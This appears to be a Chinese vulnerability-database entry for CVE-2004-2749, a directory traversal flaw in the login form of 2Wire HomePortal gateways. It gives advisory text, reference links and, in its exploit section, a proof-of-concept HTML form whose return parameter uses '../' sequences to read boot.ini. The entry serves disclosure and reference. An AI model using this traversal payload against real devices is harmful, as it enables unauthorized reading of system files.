2Wire HomePortal系列目录遍历漏洞

30次阅读
没有评论

2Wire HomePortal系列目录遍历漏洞

漏洞ID 1107636 漏洞类型 路径遍历
发布时间 2004-01-20 更新时间 2004-12-31
2Wire HomePortal系列目录遍历漏洞CVE编号 CVE-2004-2749
2Wire HomePortal系列目录遍历漏洞CNNVD-ID CNNVD-200412-893
漏洞平台 Windows CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/23562
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-893
|漏洞详情
可能用于HomePortal或其他产品系列的2WireGateway的wra/public/wralogin存在目录遍历漏洞。远程攻击者可以借助返回参数中的..(点点)读取任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/9463/info

It has been reported that the software is allegedly prone to a directory traversal vulnerability that may allow a remote attacker to access information outside the server root directory. This issue is reported to exist in the 'wralogin' authentication form that is accessed through the HTTPS (SSL) interface.

Successful exploitation of this vulnerability may allow a remote attacker to gain access to sensitive information that may be used to launch further attacks against a vulnerable system. 

All versions of 2Wire HomePortal Series have been reported to be vulnerable to this issue.

<form name="wralogin" method="get"
action="http://www.example.com/wra/public/wralogin/?error=61&return=password/../../../../boot.ini">
<input type="hidden" name="authcode" value="MUQmqC/sBiXfslfYEooIJg==">
<center>
<input type="password" name="password" value="">
<input type="submit" alt="Submit" width="58" height="19" border="0"></td>
</form>
</body>
</html>
|参考资料

来源:XF
名称:homeportal-wralogin-directory-traversal(14894)
链接:http://xforce.iss.net/xforce/xfdb/14894
来源:BID
名称:9463
链接:http://www.securityfocus.com/bid/9463
来源:OSVDB
名称:3683
链接:http://www.osvdb.org/3683
来源:SECTRACK
名称:1008798
链接:http://securitytracker.com/id?1008798
来源:SECUNIA
名称:10666
链接:http://secunia.com/advisories/10666
来源:BUGTRAQ
名称:200401202Wire-GatewayCrossSiteScriptingandDirectoryTransversalbuginSSLForm
链接:http://archives.neohapsis.com/archives/bugtraq/2004-01/0179.html

相关推荐: Youngzsoft CMailServer RCPT TO Buffer Overflow Vulnerability

Youngzsoft CMailServer RCPT TO Buffer Overflow Vulnerability 漏洞ID 1100414 漏洞类型 Boundary Condition Error 发布时间 2003-05-10 更新时间 2003-…

正文完
 0